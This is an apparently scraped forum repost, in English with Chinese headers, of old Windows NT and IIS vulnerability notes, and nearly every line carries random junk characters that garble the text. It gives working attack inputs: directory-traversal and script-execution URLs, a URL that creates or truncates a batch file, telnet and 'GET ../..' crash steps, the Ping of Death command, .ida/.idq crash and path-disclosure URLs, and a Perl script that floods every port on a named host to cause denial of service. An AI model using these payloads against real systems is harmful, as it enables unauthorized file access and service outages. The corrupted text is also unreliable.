受影響系統(tǒng):4.0,iis 1.0
: V% M! Q4 ], r) b" P7 s8 J4 ^( o- CA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
* S8 s+ J9 x& H, ?: J
% C- k ~0 g6 D& `A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
' r/ H# z$ u. v$ {, ]
% O2 X L+ z4 T" @4 A, [- }By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.4 h2 ?, U) ?5 p8 t8 R; j$ \, J
/ {+ p* t# ?' J( x$ f) r: V, ^# K--------------------------------------------------------------------
( j8 `* L) X9 i: ]& R3 b) G2 N7 n9 S8 s7 e7 V z2 C
受影響系統(tǒng):4.0" g$ W/ y$ N: f# u
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
$ l, M+ K, k3 V- C) U0 W8 i
' B v# B0 g y3 ?4 D x- M5 _: gIf the file 'target.bat' exists, the file will be truncated.& `' K& t' {1 ^5 d6 _4 D; V
9 I3 n7 |: q9 Y5 n/ x! W
' S7 f5 |" U G7 e* E9 j6 ]A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
, O& H$ x1 C" X4 P5 J |& j; n* m; K6 Y O& D# G& Q0 M
----------------------------------------------------------------------
% |- z3 m% u: I, C3 ]2 m$ z2 E' C4 Z' w6 V! v3 U. J
受影響系統(tǒng):3.51,4.0
% H" P- [+ s' u) r4 m( e3 e4 b( mMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.' V9 ` L, ]5 y
6 k( Q3 Y3 J1 {" aThe following steps;
. B6 ^" R6 @, J) V
9 q, {0 {% a gTelnet to an NT 4.0 system on port 135
" ~/ W( D: t/ D1 u6 d* @" W, Z" dType about 10 characters followed by a <CR>
5 w$ b* C$ q! n& K2 a8 P( EExit Telnet ; Z$ M9 ~! L9 [9 P5 s! G& y
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
J& ]/ w3 f2 r. P# U r4 h0 c
8 J/ F7 r a. ^: mWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.( X* h$ j% p, Y$ B
3 s8 F7 A# W- _1 D3 ]5 @+ VThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
: L4 `5 c$ t1 C, }( K; _" t \
' a( D. o, K+ b: EIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.8 v0 f5 _, _+ Y$ S. `3 F. P
, u% B* n6 B& g1 x( i |
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
& x5 M" V; ?+ F, e8 p" b H) _' g% R" L/ L, a
/*begin poke code*/3 G# ?% w: d" L9 {1 Q! G. Y6 J3 \$ d
" {7 ?# C' k0 i6 B- Uuse Socket;& X4 E3 }* `, T2 h* _' ~
use FileHandle;
2 p2 O7 B! p1 F# I+ zrequire "chat2.pl";; l4 n) b6 _* |7 ?6 R# E _) l7 Y- p
! _1 k! L5 w' F |3 z
$systemname = $ARGV[0] && shift;
! D( g6 F, E! A% a) R
* r7 z# c0 H# v$verbose = 1; # tell me what you're hitting
, k' v# \# P7 E5 g% y$knownports = 1; # don't hit known problem ports) l. o8 {9 d5 r- ?* r' u
for ($port = $0; $port<65535; $port++)
; f' o' N% Q6 d! j: W{
8 y2 Q$ m' g; j2 N# p2 b7 ?5 c# g/ s) \+ |# u4 ?) A$ Y$ w
( z# T u/ U9 g. a$ Kif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
. }9 o- f8 E$ F1 k' h" ?1 snext;
! W+ n* R2 N# c' U8 ^2 M4 x& c}9 ?. X5 W @; q# P) h* b% Y) ^% Y
$fh = chat::open_port($systemname, $port);0 O# p# D, G6 Q
chat::print ($fh,"This is about ten characters or more");
) ]8 |& `) M4 J$ y5 u: Hif ($verbose) { e/ r& [& Q6 k; b
print "Trying port: $port\n";2 {: c( a2 |& h
}
% h A6 N8 K* {. dchat::close($fh);; y$ K/ m7 o" I" j
6 @- l6 z2 M& l* M: ~0 b2 g' B. Q}
/ [* |5 Z% W; ^# W2 [( V' f6 j+ `8 H1 f
+ {! U+ ~' \ i, G
/*end poke code*/$ B8 x* K. ~! ?, G4 W- q
% ?, T5 }# ]* ]" s$ OSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
+ C/ k6 w0 b# N0 n& W
0 s, U4 q( ^7 i* Z--------------------------------------------------------------------------------
4 l9 p( o+ g. Y# [" Q: H, G& w& A3 Q: j. e' b7 |
受影響系統(tǒng):4.03 {5 m/ [. D/ k' f. Q- d" a% i
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.; { {! D% n6 h+ J# d/ L' q. X, N
$ G B5 q3 K# B1 y& CThis attack causes Dr. Watson to display an alert window and to log an error:
2 U5 t) @$ N" r3 [' S6 V: D$ `9 |8 S& @. t2 E
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"8 Y2 z1 v& U3 ^& e/ u6 a; @0 R
2 q9 j; `. Y+ B9 O
--------------------------------------------------------------------------------
6 S5 b# k b. c ~8 U. q
" A& U5 Y% E. e% r受影響系統(tǒng):3.51,4.05 M4 j' J5 V0 k# L1 Y
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:: f9 @8 l% [6 \, C1 K; w/ \9 h
# P3 m/ I0 q' z6 N N
STOP: 0X0000001E
; t' v2 S& \$ A8 J: OKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS% G# e: H8 b. X4 d
- E( G" F6 Q& i7 c9 D# ?, O
-OR- ]+ S1 T& e% N9 \
' C: O8 h# O7 t& t: WSTOP: 0x0000000A& b4 C. }' }& y' w( x: T' c2 X' ~" p
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
) H$ |: E$ P6 e* p1 Q7 h- L
& g) y' k" q4 I, R2 w, bNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.* A: N- \+ }, t
( m+ h4 d7 y3 X0 j* H--------------------------------------------------------------------------------4 G8 A6 r4 o F4 z6 k" ~& g
8 s V) P7 V$ j) ]Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
0 W, s& S3 h6 a k! c( K
3 N+ ]+ V, n5 H* L--------------------------------------------------------! s1 S# X. d9 W8 @$ X# g
- V$ O" z& X3 S$ w" ]% ]0 k
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |